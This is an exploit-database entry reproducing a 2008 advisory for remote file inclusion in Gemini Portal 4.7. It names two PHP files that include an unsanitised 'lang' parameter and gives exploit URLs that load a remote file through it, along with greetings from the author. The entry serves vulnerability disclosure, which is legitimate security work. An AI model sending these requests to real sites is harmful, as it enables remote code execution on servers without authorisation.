header-logo
Suggest Exploit
vendor:
Gemini Portal
by:
ZoRLu
9.3
CVSS
HIGH
Remote File Injection
434
CWE
Product Name: Gemini Portal
Affected Version From: 4.7
Affected Version To: 4.7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Gemini Portal Multiple Remote File Injection

Gemini Portal is prone to a remote file-injection vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Mitigation:

Input validation should be used to ensure that untrusted input is rejected.
Source

Exploit-DB raw data:

[~] The Gemini Portal Multiple Remote File inj.
[~]
[~] version: 4.7
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 26.09.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] contact: zorlu@w.cn
[~] 
[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...!
[~] 
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

file 1: gemini/page/forums/bottom.php

c0de:

include($lang);  (line16)

Exploit 1:

http://localhost/script_path/gemini/page/forums/bottom.php?lang=ZoRLu.txt?

file 2: gemini/page/forums/category.php

c0de:

include($lang);  (line 17)

Exploit 2:

http://localhost/script_path/gemini/page/forums/category.php?lang=ZoRLu.txt?

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs
[~]
[~] yildirimordulari.org  &  r00tsecurity.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-09-26]